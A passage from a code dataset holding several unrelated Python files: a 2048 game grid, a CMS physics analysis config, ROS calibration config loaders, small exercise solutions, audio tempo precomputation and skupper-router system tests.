bottom\n self._arena_y2 = top\n\n startx = left + SIDE_LENGTH/2\n starty = bottom + SIDE_LENGTH/2\n\n\n\n\n for i in range(columns):\n list = []\n\n for j in range(rows):\n\n # if (a+b)%2 == 0:\n # color = 'color.png'\n # else:\n # color = 'color1.png'\n #r = Box(left + a*SIDE_LENGTH,bottom + b*SIDE_LENGTH, color, color, a, b)\n #if i ==2 and j == 3: #i = column j = row\n r = Box(x = startx + i*SIDE_LENGTH, y = starty + j*SIDE_LENGTH,row = j, col = i, occupied = False )\n\n\n list.append(r)\n alist.append(list)\n\n return alist\n\n\n\n\n\n def grid(self):\n \"\"\"\n Draws a grid for the snake path\n \"\"\"\n result = []\n startx = SIDE_LENGTH\n endx = GAME_WIDTH-SIDE_LENGTH\n starty = SIDE_LENGTH\n endy = GAME_HEIGHT - SIDE_LENGTH\n for x in range(0,endx):\n\n if x%SIDE_LENGTH == 0:\n linex = GPath(points=[startx,starty+x,endx,starty+x],\n linewidth=2, linecolor=introcs.RGB(0,0,0))\n result.append(linex)\n for y in range(0,endy):\n if y%SIDE_LENGTH == 0:\n liney = GPath(points=[startx+y,starty,startx+y,endy],\n linewidth=2, linecolor=introcs.RGB(0,0,0))\n result.append(liney)\n return result\n\n def start(self):\n list = []\n newbox = self.addbox(2,3)\n list.append(newbox)\n newbox = self.addbox(2,0)\n list.append(newbox)\n return list\n\n def addbox(self,c,r):\n leftborder = self._arena_x1\n bottomborder = self._arena_y1\n #r = Box(x = startx + i*SIDE_LENGTH, y = starty + j*SIDE_LENGTH,row = j, col = i, occupied = False )\n xx = leftborder + SIDE_LENGTH/2 + c*SIDE_LENGTH\n yy = bottomborder + SIDE_LENGTH/2 + r*SIDE_LENGTH\n newb = Box(x=xx, y=yy, row = r, col = c, color = introcs.RGB(0,0,200))\n self._arena[c][r].occupied = True\n\n # for a in self._arena:\n # for b in a:\n # if b.occupied:\n # print(b.x, b.y)\n\n return newb\n\n\n\n def move (self,input):\n\n if input.is_key_down(\"left\"):\n\n self.d = \"left\"\n move = True\n current = True\n self.move_left()\n # p = b.x\n # b.setXPosition(p-1)\n elif input.is_key_down(\"right\"):\n self.d = \"right\"\n move = True\n current = True\n elif input.is_key_down(\"up\"):\n self.d = \"up\"\n move = True\n current = True\n elif input.is_key_down(\"down\"):\n self.d = \"down\"\n move = True\n current = True\n else:\n move = False\n current = False\n\n change = current == True and self.press ==0\n\n if move and change:\n #print(self.occupied)\n for b in self._boxlist:\n b.move = move\n #self.control_move(b)\n #print(self.occupied)\n self.press = current\n\n if input.is_key_down(\"r\"):\n print(self.occupied)\n\n\n\n\n def move_left(self):\n list = []\n for b in self._boxlist:\n c = b.col\n r = b.row\n x = b.x\n left_blocked = False\n while left_blocked==False:\n if b.col >= 0:\n left_blocked = self._arena[c-1][r].occupied\n else:\n left_blocked = True\n stop = x-SIDE_LENGTH\n if left_blocked == False:\n b.moveX(stop,\"left\")\n\n print(b.col)\n\n\n\n # def control_move(self,box):\n # xpos = box.x\n # ypos = box.y\n # c = box.col\n # r = box.row\n # max = len(self._arena)-1\n # stop = True\n # # if r == max or c == max or r == 0 or c == 0:\n # # stop=True\n #\n #\n # if self.d == \"up\":\n # if (r != max and (self.occupied[(c,r+1)]==False)):\n #\n # self.move_over(box)\n # print(1)\n # print(c,r)\n #\n # elif self.d == \"down\":\n # while (r!=0 and self.occupied[(c,r-1)] == False):\n #\n # self.move_over(box)\n # print(2)\n # print(c,r)\n #\n # elif self.d == \"right\":\n # while (c!=max and self.occupied[(c+1,r)] == False):\n #\n # self.move_over(box)\n # print(3)\n #\n # elif self.d == \"left\":\n # while (c!=0 and self.occupied[(c-1,r)] == False):\n #\n # self.move_over(box)\n # print(4)\n #\n # # if stop == False:\n # # print(\"hihi\")\n # # self.move_over(box)\n #\n def move_over(self,box):\n xpos = box.x\n ypos = box.y\n c = box.col\n r = box.row\n #box.move = True\n if self.d == \"up\":\n stopx = xpos\n stopy = ypos + SIDE_LENGTH\n box.moveY(stopy, self.d)\n elif self.d == \"down\":\n stopx = xpos\n stopy = ypos - SIDE_LENGTH\n box.moveY(stopy, self.d)\n elif self.d == \"right\":\n stopx = xpos +SIDE_LENGTH\n stopy = ypos\n box.moveX(stopx, self.d)\n elif self.d == \"left\":\n stopx = xpos - SIDE_LENGTH\n stopy = ypos\n print(\"sup\")\n print(xpos)\n print(stopx)\n box.moveX(stopx, self.d)\n #self.occupied = self.occupiedList()\n\n\n\n\n def occupiedList (self):\n dict = {}\n for a in range(len(self._arena)):\n for b in range(len(self._arena[0])):\n occ = False\n for box in self._boxlist:\n x = box.x\n y=box.y\n if self._arena[a][b].contains((x,y)):\n #print((a,b))\n occ = True\n self._arena[a][b].occupied = occ\n\n\n dict[(a,b)] = self._arena[a][b].occupied\n # print((a,b))\n # print(self._arena[a][b].occupied)\n # print()\n # print(\"1,1\")\n # print(dict[1,1])\n # print()\n # print(\"2,0\")\n # print(dict[2,0])\n\n return dict\n #\n # list = []\n # for a in self._arena:\n # alist = []\n # for b in a:\n # status = b.occupied\n # alist.append(status)\n # list.append(alist)\n # rez = [[list[j][i] for j in range(len(list))] for i in range(len(list[0]))] #transpose\n # return rez\n\n\n\n\n def check_gameover(self):\n \"\"\"\n Checks if the game is over, if all the bombs have been diffused.\n \"\"\"\n if self._diffused == self._numbombs and self.bombsLeft == 0:\n self._gameover = 'win'\n\n\n\n def nextScreen(self,input):\n \"\"\"\n After the game is over and the board has been exposed, pressing space will\n take you back to the main menu.\n \"\"\"\n if self._gameover == 'win':\n self.expose()\n self._gameLine = GLabel(text = \"Game over you win! Press space to continue.\", font_size = 30,\n x = GAME_WIDTH/2, y = GAME_HEIGHT-60)\n elif self._gameover == 'lose':\n self.expose()\n self._gameLine = GLabel(text = \"Game over you lose. Press space to continue.\", font_size = 30,\n x = GAME_WIDTH/2, y = GAME_HEIGHT-60)\n if input.is_key_down('spacebar'):\n self._gameover = 'next'\n\n\n def update(self,input,dt):\n \"\"\"\n This method Animates a single frame in the game. It sets the arena, checks\n for clicks and double clicks, etc.\n \"\"\"\n self._time +=dt\n self._movetimer += dt\n\n self.arena()\n self.move(input)\n self.occupied = self.occupiedList()\n # self.click(input)\n # self.clickCheck()\n # self.dclick(input)\n # self.dclickCheck()\n # self.scoreline()\n # self.timeline()\n # self.check_gameover()\n # self.nextScreen(input)\n # #self.uncoveredBoxes()\n # self.openBlanks()\n # #self.count()\n\n\n def draw(self,view):\n \"\"\"\n This method draws the various objects in the game, specifically the snake\n and the food\n \"\"\"\n #self._helpline.draw(view)\n #self._scoreline.draw(view)\n #self._timeline.draw(view)\n\n for r in self._arena:\n for a in r:\n a.draw(view)\n for line in self._grid:\n line.draw(view)\n for b in self._boxlist:\n b.draw(view)\n\n if self._gameLine is not None:\n self._gameLine.draw(view)\n","repo_name":"samsoff98/arcade","sub_path":"2048/Game2048.py","file_name":"Game2048.py","file_ext":"py","file_size_in_byte":11742,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"14422723426","text":"import ROOT\nfrom Workspace.RA4Analysis.cmgTuples_Data25ns_Moriond2017_reminiaod_postprocessed import *\nfrom Workspace.RA4Analysis.cmgTuples_Summer16_Moriond2017_MiniAODv2_postProcessed import *\n\n##General\n\nsample_lumi = 3000.##pb\nlumi = 35900. #2300##pb\nlumi_label = 35.9\nscale = '(1)'\nbtagVarString = 'nBJetMediumCSV30'\nbtagString = 'nBJetMediumCSV30'\n\n##For Data Only\n\n#filters = \"(Flag_goodVertices && Flag_HBHENoiseFilter_fix && Flag_eeBadScFilter && Flag_HBHENoiseIsoFilter)\" # && veto_evt_list)\"\nfilters = \"(isData&&\\\n (Flag_HBHENoiseFilter && Flag_HBHENoiseIsoFilter &&\\\n Flag_EcalDeadCellTriggerPrimitiveFilter &&\\\n Flag_goodVertices && Flag_eeBadScFilter &&\\\n Flag_globalTightHalo2016Filter &&\\\n Flag_badChargedHadronSummer2016 && Flag_badMuonSummer2016 &&\\\n ra2jetFilter && !((metMuEGClean_pt/met_caloPt)>5)))\"\n#!(Flag_badMuons) && !(Flag_duplicateMuons)))\"\n\n#trigger = \"((HLT_EleHT350||HLT_EleHT400||HLT_Ele105)||(HLT_MuHT350||HLT_MuHT400))\"\ntrigger_or_ele = \"(HLT_Ele105||HLT_Ele115||HLT_Ele50PFJet165||HLT_IsoEle27T||HLT_EleHT400||HLT_EleHT350)\"\ntrigger_or_mu = \"(HLT_Mu50||HLT_IsoMu24||HLT_MuHT400||HLT_MuHT350)\"\ntrigger_or_lep = \"%s||%s\"%(trigger_or_ele,trigger_or_mu)\ntrigger_or_met = \"(HLT_MET100MHT100||HLT_MET110MHT110||HLT_MET120MHT120)\"\ntrigger = \"((%s||%s||%s))\"%(trigger_or_ele,trigger_or_mu,trigger_or_met)\ntrigger = \"(!isData||(isData&&%s))\"%(trigger)\ntrigger_xor_ele = \"((eleDataSet&&%s))\"%(trigger_or_ele)\ntrigger_xor_mu = \"((muonDataSet&&%s&&!(%s)))\"%(trigger_or_mu,trigger_or_ele)\ntrigger_xor_met = \"((METDataSet&&%s&&!(%s)&&!(%s)) )\"%(trigger_or_met,trigger_or_ele,trigger_or_mu)\ntrigger_xor = \"(%s||%s||%s)\"%(trigger_xor_ele,trigger_xor_mu,trigger_xor_met)\ntrigger_xor = \"(!isData||(isData&&%s))\"%(trigger_xor)\n\n\n\n##Common for Background and Signal\n#trigger_scale = '((singleElectronic&&0.963)||(singleMuonic&&0.926))'\ntrigger_scale = '(singleMuonic*0.926+singleElectronic*0.963)'\nreweight = '(weight*'+str(lumi)+')/'+str(sample_lumi)\nweight_0b = 'weightBTag0_SF'\nweight_1b = 'weightBTag1_SF'\nweight_1pb = 'weightBTag1p_SF'\n\n##For MC only\nbkg_filters = \"(Flag_badChargedHadronSummer2016 && Flag_badMuonSummer2016)\"\n#lepton_Scale = 'lepton_eleSF_miniIso01*lepton_eleSF_cutbasedID*lepton_muSF_sip3d*lepton_muSF_miniIso02*lepton_muSF_mediumID'\nlepton_Scale = 'lepton_muSF_mediumID*lepton_muSF_miniIso02*lepton_muSF_sip3d*lepton_eleSF_cutbasedID*lepton_eleSF_miniIso01*lepton_eleSF_gsf'\n#lepton_Scale = 'leptonSF'\ntopPt = 'TopPtWeight'\ntop_ISR_weight = 'weight_ISR_new' ##use with a normalisation constant\nPU = 'puReweight_true_max4'\n#weight_str_plot = '*'.join([reweight,topPt,trigger_scale,PU])\n#weight_str_plot = '*'.join([trigger_scale,lepton_Scale,topPt,PU,reweight])\n##weight_str_plot = '*'.join([reweight,top_ISR_weight,lepton_Scale,\"DilepNJetCorr\",PU])\nweight_str_plot = '*'.join([reweight,top_ISR_weight,lepton_Scale,PU])\n#weight_str_CV = '*'.join([trigger_scale,lepton_Scale,topPt,reweight])\nweight_str_CV = reweight\n\n##For Signal Only\nlepton_Scale_signal_fast = 'reweightLeptonFastSimSF'\nISR_weight = 'weight_ISR_new' ##use with a normalisation constant\nlepton_Scale_signal = \"(1)\"\n#weight_str_signal_plot = '*'.join([trigger_scale,lepton_Scale_signal_fast,lepton_Scale_signal,PU,ISR_weight,reweight])\nweight_str_signal_plot = '*'.join([lepton_Scale_signal,PU,ISR_weight,reweight])\n#weight_str_signal_plot = reweight\n#weight_str_signal_CV = '*'.join([trigger_scale,lepton_Scale_signal,reweight])\n\n\ndef Draw_CMS_header(lumi_label=35.9,xPos=0.18,text=\"Preliminary\"):\n tex = ROOT.TLatex()\n tex.SetNDC()\n tex.SetTextAlign(31)\n tex.SetTextFont(42)\n tex.SetTextSize(0.05)\n tex.SetLineWidth(2)\n tex.DrawLatex(0.96,0.96,str(lumi_label)+\" fb^{-1} (13 TeV)\")\n tex = ROOT.TLatex()\n tex.SetNDC()\n tex.SetTextFont(61)\n tex.SetTextSize(0.05)\n tex.SetLineWidth(2)\n tex.DrawLatex(xPos,0.96,\"CMS\")\n tex = ROOT.TLatex()\n tex.SetNDC()\n tex.SetTextFont(52)\n tex.SetTextSize(0.05)\n tex.SetLineWidth(2)\n tex.DrawLatex(xPos+0.1,0.96,text)\n return\n\ndef Set_axis_pad2(histo):\n histo.GetXaxis().SetLabelFont(42)\n histo.GetXaxis().SetLabelOffset(0.007)\n histo.GetXaxis().SetLabelSize(0.11)\n histo.GetXaxis().SetTitleSize(0.14)\n histo.GetXaxis().SetTitleOffset(0.9)\n histo.GetXaxis().SetTitleFont(42)\n histo.GetYaxis().SetTitle(\"Data/Pred.\")\n histo.GetYaxis().SetDecimals()\n histo.GetYaxis().SetNdivisions(505)\n histo.GetYaxis().SetLabelFont(42)\n histo.GetYaxis().SetLabelOffset(0.007)\n histo.GetYaxis().SetLabelSize(0.11)\n histo.GetYaxis().SetTitleSize(0.14)\n histo.GetYaxis().SetTitleOffset(0.52)\n histo.GetYaxis().SetTitleFont(42)\n histo.GetZaxis().SetLabelFont(42)\n histo.GetZaxis().SetLabelOffset(0.007)\n histo.GetZaxis().SetLabelSize(0.05)\n histo.GetZaxis().SetTitleSize(0.06)\n histo.GetZaxis().SetTitleFont(42)\n return\n\ndef Set_axis_pad1(histo):\n histo.GetXaxis().SetLabelFont(42)\n histo.GetXaxis().SetLabelOffset(0.007)\n histo.GetXaxis().SetLabelSize(0.05)\n histo.GetXaxis().SetTitleSize(0.06)\n histo.GetXaxis().SetTitleOffset(0.9)\n histo.GetXaxis().SetTitleFont(42)\n histo.GetYaxis().SetLabelFont(42)\n histo.GetYaxis().SetLabelOffset(0.007)\n histo.GetYaxis().SetLabelSize(0.05)\n histo.GetYaxis().SetTitleSize(0.06)\n histo.GetYaxis().SetTitleOffset(1.35)\n histo.GetYaxis().SetTitleFont(42)\n histo.GetZaxis().SetLabelFont(42)\n histo.GetZaxis().SetLabelOffset(0.007)\n histo.GetZaxis().SetLabelSize(0.05)\n histo.GetZaxis().SetTitleSize(0.06)\n histo.GetZaxis().SetTitleFont(42)\n return\n\nROOT.gROOT.LoadMacro(\"../../HEPHYPythonTools/scripts/root/tdrstyle.C\")\nROOT.setTDRStyle()\nmaxN = -1\nROOT.gStyle.SetOptStat(0)\n\n\n","repo_name":"HephyAnalysisSW/Workspace","sub_path":"RA4Analysis/python/general_config.py","file_name":"general_config.py","file_ext":"py","file_size_in_byte":5750,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"15044097466","text":"\n# Standard imports\nimport os\nimport re\nimport subprocess\n\n# Ros imports\nfrom urllib.parse import urlparse\n\nimport yaml\nimport rospkg\nfrom colorama import Fore\n\n\ndef execute(cmd, blocking=True, verbose=True):\n \"\"\" @brief Executes the command in the shell in a blocking or non-blocking manner\n @param cmd a string with teh command to execute\n @return\n \"\"\"\n if verbose:\n print(\"Executing command: \" + cmd)\n p = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n if blocking: # if blocking is True:\n for line in p.stdout.readlines():\n if verbose:\n print\n line,\n p.wait()\n\n\ndef resolvePath(path, verbose=False):\n \"\"\" Resolves path by replacing environment variables, common notations (e.g. ~ for home/user)\"\"\"\n\n path = os.path.expanduser(path)\n path = os.path.expandvars(path)\n path = os.path.abspath(path)\n path = os.path.normpath(path)\n return path\n\n\ndef expandToLaunchEnv(path):\n if len(path) == 0: # if path is empty, path[0] does not exist\n return path\n\n if path[0] == '~':\n path = '$(env HOME)' + path[1:]\n\n if '$' not in path:\n return path\n\n evars = re.compile(r'\\$(\\w+|\\{[^}]*\\})')\n i = 0\n while True:\n m = evars.search(path, i)\n if not m:\n break\n\n i, j = m.span(0)\n name = m.group(1)\n if name.startswith('{') and name.endswith('}'):\n name = name[1:-1]\n\n tail = path[j:]\n path = path[:i] + '$(env {})'.format(name)\n i = len(path)\n path += tail\n\n return path\n\n\ndef uriReader(resource):\n uri = urlparse(str(resource))\n # print(uri)\n if uri.scheme == 'package': # using a ros package uri\n # print('This is a ros package')\n rospack = rospkg.RosPack()\n assert (rospack.get_path(uri.netloc)), 'Package ' + uri.netloc + ' does not exist.'\n fullpath = resolvePath(rospack.get_path(uri.netloc) + uri.path)\n relpath = '$(find {}){}'.format(uri.netloc, uri.path)\n\n elif uri.scheme == 'file': # local file\n # print('This is a local file')\n fullpath = resolvePath(uri.netloc + uri.path)\n relpath = fullpath\n elif uri.scheme == '': # no scheme, assume local file\n # print('This is a local file')\n\n fullpath = resolvePath(uri.path)\n relpath = expandToLaunchEnv(uri.path)\n else:\n raise ValueError('Cannot parse resource \"' + resource + '\", unknown scheme \"' + uri.scheme + '\".')\n\n assert (os.path.exists(fullpath)), Fore.RED + fullpath + ' does not exist.'\n return fullpath, os.path.basename(fullpath), relpath\n\n\ndef verifyConfig(config, template_config, upper_key=None):\n missing_keys = []\n for key in template_config:\n # print('Checking key ' + key)\n if not key in config:\n if upper_key is None:\n missing_keys.append(key)\n else:\n missing_keys.append(upper_key + '/' + key)\n # print(str(key) + ' is not here: ' + str(config))\n elif type(config[key]) is dict and not key == 'sensors':\n # print('key ' + key + ' is a dict')\n\n if upper_key is None:\n mk = verifyConfig(config[key], template_config[key], key)\n else:\n mk = verifyConfig(config[key], template_config[key], upper_key + '/' + key)\n missing_keys.extend(mk)\n\n return missing_keys\n\n\ndef loadConfig(filename, check_paths=True):\n config = loadYMLConfig(filename)\n if config is None:\n raise ValueError(Fore.RED + 'Your config file ' + filename +\n ' could not be read. Aborting.' + Fore.RESET)\n\n # if \"robot_name\" not in config.keys(): # in config:\n # raise ValueError(Fore.RED +\n # 'Error: argument robot_name is missing in config.yaml'+ Style.RESET_ALL)\n # Check if config has all the necessary keys.\n rospack = rospkg.RosPack()\n template_file = rospack.get_path('atom_calibration') + '/templates/config.yml'\n template_config = loadYMLConfig(template_file)\n missing_parameters = verifyConfig(config, template_config)\n # print(missing_parameters)\n\n if missing_parameters: # list is not empty\n # TODO: #589 find another way to resolve this\n if missing_parameters != ['additional_tfs']: # I added this line to run old config.yml files, but here the 'additional_tfs' key don't raise an error if missing.\n raise ValueError(Fore.RED + 'Your config file ' + filename +\n ' appears to be corrupted. These mandatory parameters are missing: ' + Fore.BLUE +\n str(missing_parameters) + Fore.RED + '\\nPerhaps you should re-run:\\n' + Fore.BLUE +\n ' rosrun _calibration configure' + Fore.RESET)\n\n # Check if description file is ok\n # print(config['description_file'])\n fullpath, name, uri = uriReader(config['description_file'])\n\n # Check if bag_file is ok\n fullpath, name, uri = uriReader(config['bag_file'])\n\n # Check if calibration_pattern/mesh_file is ok\n fullpath, name, uri = uriReader(config['calibration_pattern']['mesh_file'])\n\n return config\n\n\ndef loadYMLConfig(filename):\n \"\"\"Load configuration from a yml file\"\"\"\n try:\n with open(filename, 'r') as f:\n obj = yaml.load(f, Loader=yaml.SafeLoader)\n except OSError as e:\n print(\"I/O error({0}): {1}\".format(e.errno, e.strerror))\n return None\n\n return obj\n\n\ndef validateLinks(world_link, sensors, urdf):\n try:\n for name, sensor in sensors.items():\n chain = urdf.get_chain(world_link, sensor.link)\n if sensor.parent_link not in chain or sensor.child_link not in chain:\n print(\"{}: The links '{}' and '{}' are not part of the same chain.\".format(sensor.name,\n sensor.parent_link,\n sensor.child_link))\n return False\n except KeyError as e:\n link_name = str(e).strip(\"'\")\n if link_name == urdf.get_root():\n print(\"Configuration contains an unknown base link: {}\".format(world_link))\n return False\n\n print(\"Configuration contains an unknown link: {}\".format(link_name))\n return False\n\n return True\n","repo_name":"lardemua/atom","sub_path":"atom_core/src/atom_core/config_io.py","file_name":"config_io.py","file_ext":"py","file_size_in_byte":6492,"program_lang":"python","lang":"en","doc_type":"code","stars":208,"dataset":"github-code","pt":"32"} +{"seq_id":"41453430523","text":"L = int(input())\nlettres = input()\nN = int(input())\n\ndef noms(taille):\n global lettres\n if taille == 1:\n return lettres\n elif taille%2:\n precedent = noms((taille-1)//2)\n return [a+e+l for l in lettres for a in precedent for e in precedent]\n else:\n precedent = noms(taille//2)\n return [a+e for a in precedent for e in precedent]\n\n\nprint(L**N)\nfor mot in noms(N):\n print(mot)","repo_name":"Tueur-dombres/france-ioi","sub_path":"niv_4_récursivité/changement_de_nom_exponentiation_rapide.py","file_name":"changement_de_nom_exponentiation_rapide.py","file_ext":"py","file_size_in_byte":423,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"42087334503","text":"num = int(input())\nNandM = []\n\nfor i in range(num):\n NandM.append(list(map(int, input().split(' '))))\n\ndef combination(a, b):\n result = 1\n for i in range(b):\n result = result * (a - i) / (i +1)\n return int(result)\n\n\nfor numBridge in range(num):\n print(combination(NandM[numBridge][1], NandM[numBridge][0]))\n","repo_name":"OriQuack/bakjunSolution","sub_path":"BridgeComb.py","file_name":"BridgeComb.py","file_ext":"py","file_size_in_byte":329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"39933661227","text":"import librosa\nimport numpy as np\n\ndef load_song(path_to, win_len=3):\n x, sr = librosa.load(path_to)\n win = sr * win_len\n lx = len(x)\n xp_len = int(np.ceil(lx/win)) * win\n x.resize(xp_len)\n x_chunks = x.reshape((len(x) // (sr * win_len), (sr * win_len)))\n return x_chunks\n\n# def precompute_t_v(x_chunks, sr=22050):\n# tempos, volumes = [], []\n# tempo, volume = [], []\n# for xc in x_chunks:\n# tempo.append(np.floor(tempo_obj.global_tempo(xc, sr)))\n# volume.append(volume_obj.get_average_power(xc, sr))\n\n# if len(tempo) == 3:\n# tempos.append(medfilt(tempo)[1])\n# volumes.append(medfilt(volume)[1])\n# tempo, volume = [], []\n\n# return tempos, volumes\n\ndef precompute_t_v(signal, sr=22050):\n tempos = tempo_obj.overlap_windowed_tempo(signal)\n volumes = volume_obj.overlap_windowed_volume(signal)\n\n return tempos, volumes\n\n\n# returns tempo-volume data for songs in db\n# def get_songs_from_db():\n# songs = {}\n# for song_data in database.get_songs():\n# song = load_song(song_data['path'], win_len=1)\n# tv = precompute_t_v(song)\n# if song_data['title'] in songs:\n# songs[song_data['title']][song_data['performer']] = tv\n# else:\n# songs[song_data['title']] = {\n# song_data['performer']: tv\n# }\n# print(songs)\n# return songs\n\ndef get_songs_from_db():\n songs = {}\n for song_data in database.get_songs():\n song, sr = librosa.load(song_data['path'])\n tv = precompute_t_v(song)\n print(song_data['performer'] + \": \" + song_data['title'])\n if song_data['title'] in songs:\n songs[song_data['title']][song_data['performer']] = tv\n else:\n songs[song_data['title']] = {\n song_data['performer']: tv\n }\n return songs\n\nsongs_mapping = get_songs_from_db()","repo_name":"jrmylee/vivace","sub_path":"api/seed/precompute.py","file_name":"precompute.py","file_ext":"py","file_size_in_byte":1927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"43677509257","text":"# LeetCode 771: Jewels and Stones\n# You're given strings J representing the types of stones \n# that are jewels, and S representing the stones you have. \n# Each character in S is a type of stone you have. \n# You want to know how many of the stones you have are also jewels.\n\n# The letters in J are guaranteed distinct, and all characters in \n# J and S are letters. Letters are case sensitive, so \"a\" is considered \n# a different type of stone from \"A\".\n\n# Example 1:\n# Input: J = \"aA\", S = \"aAAbbbb\"\n# Output: 3\n\n# Example 2:\n# Input: J = \"z\", S = \"ZZ\"\n# Output: 0\n\n# Method: put the letters of J (jewels) in a set\n# Iterate through S (stones), and increment count if letter in jewel set\ndef numJewelsInStones(self, J, S):\n s = set()\n for letter in J:\n s.add(letter)\n \n count = 0\n for letter in S:\n if letter in s:\n count += 1\n \n return count\n\n# Method: iterate through jewels\n# Count the number of that jewel in S (stones)\n# Add to running sum; return sum\ndef numJewelsInStonesBetter(self, J, S):\n count = 0\n \n for letter in J:\n count += S.count(letter)\n \n return count\n\n# Method: Iterate through stones\n# Count the stone if it's also in jewel\ndef numJewelsInStonesBest(self, J, S):\n count = 0\n \n for letter in S:\n if letter in J:\n count += 1\n \n return count","repo_name":"joannalew/CTCI","sub_path":"Python/str-jewel-stones.py","file_name":"str-jewel-stones.py","file_ext":"py","file_size_in_byte":1369,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"19898689268","text":"import json\nimport os\nimport logging\nfrom time import sleep\nfrom threading import Timer\nfrom subprocess import PIPE, STDOUT\n\nfrom proton import Message, Delivery, symbol, Condition\nfrom proton.handlers import MessagingHandler\nfrom proton.reactor import Container, AtLeastOnce\nfrom proton.utils import BlockingConnection\n\nfrom skupper_router.management.client import Node\n\nfrom system_test import TestCase, Process, Qdrouterd, main_module, TIMEOUT, TestTimeout, PollTimeout\nfrom system_test import AsyncTestReceiver, retry\nfrom system_test import AsyncTestSender\nfrom system_test import get_inter_router_links\nfrom system_test import unittest, ROUTER_TYPE, CONNECTION_TYPE\nfrom system_test import ROUTER_ADDRESS_TYPE, AMQP_CONNECTOR_TYPE\n\nCONNECTION_PROPERTIES_UNICODE_STRING = {'connection': 'properties', 'int_property': 6451}\n\n\nclass TwoRouterTest(TestCase):\n\n inter_router_port = None\n\n @classmethod\n def setUpClass(cls):\n \"\"\"Start a router and a messenger\"\"\"\n super(TwoRouterTest, cls).setUpClass()\n\n def router(name, connection):\n config = [\n ('router', {'remoteLsMaxAgeSeconds': 60, 'helloIntervalSeconds': 1, 'raIntervalSeconds': 30,\n 'raIntervalFluxSeconds': 4, 'mode': 'interior', 'id': 'QDR.%s' % name}),\n ('listener', {'port': cls.tester.get_port(), 'stripAnnotations': 'no', 'linkCapacity': 500}),\n\n ('listener', {'port': cls.tester.get_port(), 'stripAnnotations': 'no'}),\n ('listener', {'port': cls.tester.get_port(), 'stripAnnotations': 'both'}),\n ('listener', {'port': cls.tester.get_port(), 'stripAnnotations': 'out'}),\n ('listener', {'port': cls.tester.get_port(), 'stripAnnotations': 'in'}),\n\n ('address', {'prefix': 'closest', 'distribution': 'closest'}),\n ('address', {'prefix': 'balanced', 'distribution': 'balanced'}),\n ('address', {'prefix': 'multicast', 'distribution': 'multicast'}),\n\n # for testing pattern matching\n ('address', {'pattern': 'a.b.c.d',\n 'distribution': 'closest'}),\n ('address', {'pattern': '#.b.c.d',\n 'distribution': 'multicast'}),\n ('address', {'pattern': 'a/*/#/d',\n 'distribution': 'closest'}),\n ('address', {'pattern': '*/b/c/d',\n 'distribution': 'multicast'}),\n ('address', {'pattern': 'a.x.d',\n 'distribution': 'closest'}),\n ('address', {'pattern': 'a.*.d',\n 'distribution': 'multicast'}),\n connection\n ]\n\n config = Qdrouterd.Config(config)\n\n cls.routers.append(cls.tester.qdrouterd(name, config, wait=True))\n\n cls.routers = []\n\n inter_router_port = cls.tester.get_port()\n\n router('A', ('listener', {'role': 'inter-router', 'port': inter_router_port}))\n\n router('B', ('connector', {'name': 'connectorToA', 'role': 'inter-router', 'port': inter_router_port}))\n\n cls.routers[0].wait_router_connected('QDR.B')\n cls.routers[1].wait_router_connected('QDR.A')\n\n def address(self):\n return self.routers[0].addresses[0]\n\n def run_skmanage(self, cmd, input=None, expect=Process.EXIT_OK, address=None):\n p = self.popen(\n ['skmanage'] + cmd.split(' ') + ['--bus', address or self.address(), '--indent=-1', '--timeout', str(TIMEOUT)],\n stdin=PIPE, stdout=PIPE, stderr=STDOUT, expect=expect,\n universal_newlines=True)\n out = p.communicate(input)[0]\n try:\n p.teardown()\n except Exception as e:\n raise Exception(out if out else str(e))\n return out\n\n def test_01_pre_settled(self):\n test = DeliveriesInTransit(self.routers[0].addresses[0], self.routers[1].addresses[0])\n test.run()\n self.assertIsNone(test.error)\n\n local_node = Node.connect(self.routers[0].addresses[0], timeout=TIMEOUT)\n outs = local_node.query(type=ROUTER_TYPE)\n\n # deliveriesTransit must most surely be greater than num_msgs\n pos = outs.attribute_names.index(\"deliveriesTransit\")\n results = outs.results[0]\n self.assertGreater(results[pos], 104)\n\n def test_02a_multicast_unsettled(self):\n test = MulticastUnsettled(self.routers[0].addresses[0])\n test.run()\n self.assertIsNone(test.error)\n\n def test_02c_sender_settles_first(self):\n test = SenderSettlesFirst(self.routers[0].addresses[0], self.routers[1].addresses[0])\n test.run()\n self.assertIsNone(test.error)\n\n def test_04_management(self):\n test = ManagementTest(self.routers[0].addresses[0])\n test.run()\n self.assertIsNone(test.error)\n\n def test_06_semantics_closest_is_local(self):\n test = SemanticsClosestIsLocal(self.routers[0].addresses[0], self.routers[1].addresses[0])\n test.run()\n self.assertIsNone(test.error)\n\n def test_07_semantics_closest_is_remote(self):\n test = SemanticsClosestIsRemote(self.routers[0].addresses[0],\n self.routers[1].addresses[0],\n self.routers[0],\n self.routers[1])\n test.run()\n self.assertIsNone(test.error)\n\n def test_08_semantics_balanced(self):\n test = SemanticsBalanced(self.routers[0].addresses[0], self.routers[0].addresses[1],\n self.routers[1].addresses[0])\n test.run()\n self.assertIsNone(test.error)\n\n def test_10_propagated_disposition(self):\n test = PropagatedDisposition(self, self.routers[0].addresses[0], self.routers[1].addresses[0],\n \"unsettled/one\")\n test.run()\n self.assertTrue(test.passed)\n\n def test_10a_propagated_disposition_data(self):\n test = PropagatedDispositionData(self, self.routers[0].addresses[0], self.routers[1].addresses[0],\n \"unsettled/two\")\n test.run()\n self.assertTrue(test.passed)\n\n def test_11_three_ack(self):\n test = ThreeAck(self, self.routers[0].addresses[0], self.routers[1].addresses[0])\n test.run()\n\n def test_12_excess_deliveries_released(self):\n \"\"\"\n Message-route a series of deliveries where the receiver provides credit for a subset and\n once received, closes the link. The remaining deliveries should be released back to the sender.\n \"\"\"\n test = ExcessDeliveriesReleasedTest(self.routers[0].addresses[0], self.routers[1].addresses[0])\n test.run()\n self.assertIsNone(test.error)\n\n def test_15_attach_on_inter_router(self):\n test = 